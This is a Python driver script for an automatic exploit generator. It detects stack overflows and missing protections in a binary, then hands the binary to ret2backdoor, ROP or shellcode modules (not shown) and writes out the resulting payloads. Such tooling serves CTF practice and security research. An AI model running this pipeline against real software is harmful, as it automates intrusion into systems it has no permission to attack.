AutoPwn.py
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
from pwncli import *
from analysis import inputDetector
from analysis import protectionDetector
from analysis import backdoorDetector
from analysis import overflowDetector_static
from analysis import overflowDetector_dynamic
from exploits import ret2backdoor
from exploits import stackRop
from exploits import stackShellcode
# basicConfig() attaches the default handler when the root logger has none;
# the root level is then lowered to INFO so the "[+]" progress lines show.
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
log = logging.getLogger(__name__)

# Module-level placeholders. No function visible in this listing declares
# them `global`, so assignments to the same names inside functions create
# locals and leave these values untouched.
binary_file_path = ""
input_funcs = list()
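def main():
    """Analyze one binary and hand it to the first matching exploit module.

    The binary path comes from the single positional command-line argument.
    Input functions, protection properties, backdoor candidates and
    statically detected overflows are collected first.  Nothing further
    happens unless at least one overflow was reported and the binary has no
    stack canary.  Every later branch is gated on a mitigation being absent
    (PIE, full RELRO) or on RWX segments being present, so a binary built
    with a canary, or with PIE and full RELRO and no RWX segment, falls
    through without any payload being produced.

    ret2backdoor payloads are written to the current working directory as
    ``<binary>-exploit-<n>``, numbered from 1.

    NOTE(review): the listing this function was taken from had lost its
    indentation; the nesting below is reconstructed from the statement order
    and should be confirmed against the repository copy.
    """
    parser = argparse.ArgumentParser()
    # "file" is a required positional: argparse itself exits with a usage
    # error when it is missing, so args.file can never be None here and the
    # former `is None` / exit(1) branch was unreachable.
    parser.add_argument("file", help="File to analyze")
    args = parser.parse_args()

    target_path = os.path.abspath(args.file)

    log.info("[+] Check input functions")
    detected_inputs = inputDetector.getInputFuncs(target_path)
    log.info("[+] Check properties")
    properties = protectionDetector.getProperties(target_path)
    log.info("[+] Check backdoor")
    backdoors = backdoorDetector.getBackdoors(target_path)
    log.info("[+] Check overflow")
    overflow_list = overflowDetector_static.analysis(
        target_path, detected_inputs, properties)

    # Guard clauses: without a reported overflow, or with a stack canary
    # present, none of the exploit modules is tried.
    if len(overflow_list) == 0:
        return
    log.info("[+] Overflow exist")
    if properties['canary']:
        return
    log.info("[+] No Canary")

    if len(backdoors) > 0:
        log.info("[+] Backdoors exist")
        # The backdoor path is only attempted on non-PIE binaries.
        if not properties['pie']:
            log.info("[+] No PIE")
            payload = ret2backdoor.exploit(target_path, overflow_list,
                                           backdoors)
            binary_name = os.path.basename(target_path)
            for index, blob in enumerate(payload, start=1):
                filename = '%s-exploit-%s' % (binary_name, index)
                # 'wb' truncates any existing file of the same name.
                with open(filename, 'wb') as f:
                    f.write(blob)
                print("%s exploit in %s" % (binary_name, filename))
                print("run with `(cat %s; cat -) | %s`"
                      % (filename, target_path))
    elif properties['relro'] != 'Full':
        log.info("[+] Try ROP")
        if not properties['pie']:
            log.info("[+] No PIE")
            stackRop.exp(target_path, overflow_list)
    elif properties['RWX']:
        # Reached only when there are no backdoor candidates and RELRO is
        # 'Full'.
        log.info("[+] Has RWX segments")
        stackShellcode.exp(target_path, properties)

    # Dynamic overflow detection is currently disabled:
    # exploitable_state = overflowDetector_dynamic.analysis(binary_file_path)
    # ret2backdoor.exploit_dynamic(exploitable_state,backdoors)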
def stackShellcodeTest():
    """Run only the stackShellcode module on the binary named on the command line.

    Takes the same single positional ``file`` argument as main(), but skips
    input-function, backdoor and overflow detection and none of main()'s
    protection checks gate the call: the detected properties are passed
    straight to ``stackShellcode.exp``.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("file", help="File to analyze")
    target = os.path.abspath(cli.parse_args().file)

    detected = protectionDetector.getProperties(target)
    stackShellcode.exp(target, detected)
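def ret2backdoorTest():
    """Run only the ret2backdoor module on the binary named on the command line.

    Takes the same single positional ``file`` argument as main() and runs
    the same detection passes, but without main()'s canary / PIE gating.
    Each payload returned by ``ret2backdoor.exploit`` is written to the
    current working directory as ``<binary>-exploit-<n>``, numbered from 1.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("file", help="File to analyze")
    args = parser.parse_args()
    target_path = os.path.abspath(args.file)

    detected_inputs = inputDetector.getInputFuncs(target_path)
    properties = protectionDetector.getProperties(target_path)
    backdoors = backdoorDetector.getBackdoors(target_path)
    # Pass the properties as main() does; they were previously computed here
    # but never used, and analysis() was called with one argument fewer.
    # NOTE(review): confirm against overflowDetector_static.analysis's
    # signature.
    overflow_list = overflowDetector_static.analysis(
        target_path, detected_inputs, properties)
    payload = ret2backdoor.exploit(target_path, overflow_list, backdoors)

    binary_name = os.path.basename(target_path)
    for index, blob in enumerate(payload, start=1):
        filename = '%s-exploit-%s' % (binary_name, index)
        # 'wb' truncates any existing file of the same name.
        with open(filename, 'wb') as f:
            f.write(blob)
        print("%s exploit in %s" % (binary_name, filename))
        print("run with `(cat %s; cat -) | %s`" % (filename, target_path))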
# Script entry point: only the full pipeline in main() is wired up; the
# *Test helpers in this file are not called from here.
if __name__ == "__main__":
    main()